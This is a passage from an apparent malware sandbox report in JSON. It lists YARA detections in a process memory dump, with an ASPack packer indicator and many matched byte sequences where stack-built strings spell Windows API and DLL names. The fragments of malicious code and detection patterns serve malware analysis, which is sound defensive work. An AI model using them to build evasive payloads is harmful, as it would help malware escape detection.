"shellcode_stack_strings" }, { "Binary triggered YARA rule": "INDICATOR_EXE_Packed_ASPack" } ], "new_data": [], "alert": false, "families": [] }, { "name": "procmem_yara", "description": "Yara detections observed in process dumps, payloads or dropped files", "categories": [ "malware" ], "severity": 3, "weight": 4, "confidence": 100, "references": [], "data": [ { "Hit": "PID 4492 triggered the Yara rule 'INDICATOR_EXE_Packed_ASPack' with data '['{ 00 00 C0 2E 61 73 70 61 63 6B 00 00 }']'" }, { "Hit": "PID 4492 triggered the Yara rule 'shellcode_stack_strings' with data '['{ C6 45 F3 32 C6 45 F4 2E C6 45 F5 64 C6 45 F6 6C C6 45 F7 6C C6 45 F8 00 }', '{ C6 45 F4 2E C6 45 F5 64 C6 45 F6 6C C6 45 F7 6C C6 45 F8 00 }', '{ C6 45 8B 32 C6 45 8C 2E C6 45 8D 64 C6 45 8E 6C C6 45 8F 6C C6 45 90 00 }', '{ C6 45 8C 2E C6 45 8D 64 C6 45 8E 6C C6 45 8F 6C C6 45 90 00 }', '{ C6 45 B4 55 C6 45 B5 41 C6 45 B6 43 C6 45 B7 4D C6 45 B8 75 C6 45 B9 74 C6 45 BA 00 }', '{ C6 45 B5 41 C6 45 B6 43 C6 45 B7 4D C6 45 B8 75 C6 45 B9 74 C6 45 BA 00 }', '{ C6 45 B6 43 C6 45 B7 4D C6 45 B8 75 C6 45 B9 74 C6 45 BA 00 }', '{ C6 85 A0 FE FF FF 6E C6 85 A1 FE FF FF 74 C6 85 A2 FE FF FF 64 C6 85 A3 FE FF FF 6C C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }', '{ C6 85 A1 FE FF FF 74 C6 85 A2 FE FF FF 64 C6 85 A3 FE FF FF 6C C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }', '{ C6 85 A2 FE FF FF 64 C6 85 A3 FE FF FF 6C C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }', '{ C6 85 A3 FE FF FF 6C C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }', '{ C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }', '{ C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }', '{ C6 85 76 FE FF FF 32 C6 85 77 FE FF FF 2E C6 85 78 FE FF FF 64 C6 85 79 FE FF FF 6C C6 85 7A FE FF FF 6C C6 85 7B FE FF FF 00 }', '{ C6 85 77 FE FF FF 2E C6 85 78 FE FF FF 64 C6 85 79 FE FF FF 6C C6 85 7A FE FF FF 6C C6 85 7B FE FF FF 00 }', '{ C6 85 58 FE FF FF 70 C6 85 59 FE FF FF 73 C6 85 5A FE FF FF 61 C6 85 5B FE FF FF 70 C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }', '{ C6 85 59 FE FF FF 73 C6 85 5A FE FF FF 61 C6 85 5B FE FF FF 70 C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }', '{ C6 85 5A FE FF FF 61 C6 85 5B FE FF FF 70 C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }', '{ C6 85 5B FE FF FF 70 C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }', '{ C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }', '{ C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }', '{ C6 85 77 FA FF FF 32 C6 85 78 FA FF FF 53 C6 85 79 FA FF FF 6E C6 85 7A FA FF FF 61 C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }', '{ C6 85 78 FA FF FF 53 C6 85 79 FA FF FF 6E C6 85 7A FA FF FF 61 C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }', '{ C6 85 79 FA FF FF 6E C6 85 7A FA FF FF 61 C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }', '{ C6 85 7A FA FF FF 61 C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }', '{ C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }', '{ C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }', '{ C6 85 AC FC FF FF 32 C6 85 AD FC FF FF 46 C6 85 AE FC FF FF 69 C6 85 AF FC FF FF 72 C6 85 B0 FC FF FF 73 C6 85 B1 FC FF FF 74 C6 85 B2 FC FF FF 00 }', '{ C6 85 AD FC FF FF 46 C6 85 AE FC FF FF 69 C6 85 AF FC FF FF 72 C6 85 B0 FC FF FF 73 C6 85 B1 FC FF FF 74 C6 85 B2 FC FF FF 00 }', '{ C6 85 AE FC FF FF 69 C6 85 AF FC FF FF 72 C6 85 B0 FC FF FF 73 C6 85 B1 FC FF FF 74 C6 85 B2 FC FF FF 00 }', '{ C6 85 0B FD FF FF 32 C6 85 0C FD FF FF 46 C6 85 0D FD FF FF 69 C6 85 0E FD FF FF 72 C6 85 0F FD FF FF 73 C6 85 10 FD FF FF 74 C6 85 11 FD FF FF 00 }', '{ C6 85 0C FD FF FF 46 C6 85 0D FD FF FF 69 C6 85 0E FD FF FF 72 C6 85 0F FD FF FF 73 C6 85 10 FD FF FF 74 C6 85 11 FD FF FF 00 }', '{ C6 85 0D FD FF FF 69 C6 85 0E FD FF FF 72 C6 85 0F FD FF FF 73 C6 85 10 FD FF FF 74 C6 85 11 FD FF FF 00 }', '{ C6 85 7D FE FF FF 6C C6 85 7E FE FF FF 6F C6 85 7F FE FF FF 62 C6 85 80 FE FF FF 61 C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }', '{ C6 85 7E FE FF FF 6F C6 85 7F FE FF FF 62 C6 85 80 FE FF FF 61 C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }', '{ C6 85 7F FE FF FF 62 C6 85 80 FE FF FF 61 C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }', '{ C6 85 80 FE FF FF 61 C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }', '{ C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }', '{ C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }', '{ C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }', '{ C6 85 3F FB FF FF 6E C6 85 40 FB FF FF 49 C6 85 41 FB FF FF 6E C6 85 42 FB FF FF 66 C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }', '{ C6 85 40 FB FF FF 49 C6 85 41 FB FF FF 6E C6 85 42 FB FF FF 66 C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }', '{ C6 85 41 FB FF FF 6E C6 85 42 FB FF FF 66 C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }', '{ C6 85 42 FB FF FF 66 C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }', '{ C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }', '{ C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }', '{ C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }', '{ C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }', '{ C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }', '{ C6 85 64 FE FF FF 45 C6 85 65 FE FF FF 71 C6 85 66 FE FF FF 75 C6 85 67 FE FF FF 61 C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }', '{ C6 85 65 FE FF FF 71 C6 85 66 FE FF FF 75 C6 85 67 FE FF FF 61 C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }', '{ C6 85 66 FE FF FF 75 C6 85 67 FE FF FF 61 C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }', '{ C6 85 67 FE FF FF 61 C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }', '{ C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }', '{ C6 85 B0 FB FF FF 4C C6 85 B1 FB FF FF 6F C6 85 B2 FB FF FF 6F C6 85 B3 FB FF FF 6B C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }', '{ C6 85 B1 FB FF FF 6F C6 85 B2 FB FF FF 6F C6 85 B3 FB FF FF 6B C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }', '{ C6 85 B2 FB FF FF 6F C6 85 B3 FB FF FF 6B C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }', '{ C6 85 B3 FB FF FF 6B C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }', '{ C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }', '{ C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }', '{ C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }', '{ C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }', '{ C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }', '{ C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }', '{ C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }', '{ C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }', '{ C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }', '{ C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }', '{ C6 85 59 FB FF FF 63 C6 85 5A FB FF FF 74 C6 85 5B FB FF FF 6F C6 85 5C FB FF FF 72 C6 85 5D FB FF FF 79 C6 85 5E FB FF FF 41 C6 85 5F FB FF FF 00 }', '{ C6 85 5A FB FF FF 74 C6 85 5B FB FF FF 6F C6 85 5C FB FF FF 72 C6 85 5D FB FF FF 79 C6 85 5E FB FF FF 41 C6 85 5F FB FF FF 00 }', '{ C6 85 5B FB FF FF 6F C6 85 5C FB FF FF 72 C6 85 5D FB FF FF 79 C6 85 5E FB FF FF 41 C6 85 5F FB FF FF 00 }', '{ C6 85 31 FB FF FF 63 C6 85 32 FB FF FF 74 C6 85 33 FB FF FF 6F C6 85 34 FB FF FF 72 C6 85 35 FB FF FF 79 C6 85 36 FB FF FF 57 C6 85 37 FB FF FF 00 }', '{ C6 85 32 FB FF FF 74 C6 85 33 FB FF FF 6F C6 85 34 FB FF FF 72 C6 85 35 FB FF FF 79 C6 85 36 FB FF FF 57 C6 85 37 FB FF FF 00 }', '{ C6 85 33 FB FF FF 6F C6 85 34 FB FF FF 72 C6 85 35 FB FF FF 79 C6 85 36 FB FF FF 57 C6 85 37 FB FF FF 00 }', '{ C6 85 B1 FA FF FF 72 C6 85 B2 FA FF FF 50 C6 85 B3 FA FF FF 61 C6 85 B4 FA FF FF 74 C6 85 B5 FA FF FF 68 C6 85 B6 FA FF FF 41 C6 85 B7 FA FF FF 00 }', '{ C6 85 B2 FA FF FF 50 C6 85 B3 FA FF FF 61 C6 85 B4 FA FF FF 74 C6 85 B5 FA FF FF 68 C6 85 B6 FA FF FF 41 C6 85 B7 FA FF FF 00 }', '{ C6 85 B3 FA FF FF 61 C6 85 B4 FA FF FF 74 C6 85 B5 FA FF FF 68 C6 85 B6 FA FF FF 41 C6 85 B7 FA FF FF 00 }', '{ C6 85 C9 FA FF FF 72 C6 85 CA FA FF FF 50 C6 85 CB FA FF FF 61 C6 85 CC FA FF FF 74 C6 85 CD FA FF FF 68 C6 85 CE FA FF FF 57 C6 85 CF FA FF FF 00 }', '{ C6 85 CA FA FF FF 50 C6 85 CB FA FF FF 61 C6 85 CC FA FF FF 74 C6 85 CD FA FF FF 68 C6 85 CE FA FF FF 57 C6 85 CF FA FF FF 00 }', '{ C6 85 CB FA FF FF 61 C6 85 CC FA FF FF 74 C6 85 CD FA FF FF 68 C6 85 CE FA FF FF 57 C6 85 CF FA FF FF 00 }', '{ C6 85 1D FD FF FF 79 C6 85 1E FD FF FF 45 C6 85 1F FD FF FF 78 C6 85 20 FD FF FF 41 C6 85 21 FD FF FF 00 }', '{ C6 85 2D FD FF FF 79 C6 85 2E FD FF FF 45 C6 85 2F FD FF FF 78 C6 85 30 FD FF FF 57 C6 85 31 FD FF FF 00 }', '{ C6 85 0B FC FF FF 74 C6 85 0C FC FF FF 6F C6 85 0D FC FF FF 72 C6 85 0E FC FF FF 79 C6 85 0F FC FF FF 57 C6 85 10 FC FF FF 00 }', '{ C6 85 0C FC FF FF 6F C6 85 0D FC FF FF 72 C6 85 0E FC FF FF 79 C6 85 0F FC FF FF 57 C6 85 10 FC FF FF 00 }', '{ C6 85 48 FD FF FF 56 C6 85 49 FD FF FF 69 C6 85 4A FD FF FF 72 C6 85 4B FD FF FF 74 C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }', '{ C6 85 49 FD FF FF 69 C6 85 4A FD FF FF 72 C6 85 4B FD FF FF 74 C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }', '{ C6 85 4A FD FF FF 72 C6 85 4B FD FF FF 74 C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }', '{ C6 85 4B FD FF FF 74 C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }', '{ C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }', '{ C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }', '{ C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }', '{ C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }', '{ C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }', '{ C6 85 6A FD FF FF 74 C6 85 6B FD FF FF 54 C6 85 6C FD FF FF 69 C6 85 6D FD FF FF 63 C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }', '{ C6 85 6B FD FF FF 54 C6 85 6C FD FF FF 69 C6 85 6D FD FF FF 63 C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }', '{ C6 85 6C FD FF FF 69 C6 85 6D FD FF FF 63 C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }', '{ C6 85 6D FD FF FF 63 C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }', '{ C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }', '{ C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }', '{ C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }', '{ C6 85 EF FA FF FF 63 C6 85 F0 FA FF FF 74 C6 85 F1 FA FF FF 69 C6 85 F2 FA FF FF 6F C6 85 F3 FA FF FF 6E C6 85 F4 FA FF FF 00 }', '{ C6 85 F0 FA FF FF 74 C6 85 F1 FA FF FF 69 C6 85 F2 FA FF FF 6F C6 85 F3 FA FF FF 6E C6 85 F4 FA FF FF 00 }', '{ C6 85 D4 FC FF FF 56 C6 85 D5 FC FF FF 69 C6 85 D6 FC FF FF 72 C6 85 D7 FC FF FF 74 C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }', '{ C6 85 D5 FC FF FF 69 C6 85 D6 FC FF FF 72 C6 85 D7 FC FF FF 74 C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }', '{ C6 85 D6 FC FF FF 72 C6 85 D7 FC FF FF 74 C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }', '{ C6 85 D7 FC FF FF 74 C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }', '{ C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }', '{ C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }', '{ C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }', '{ C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 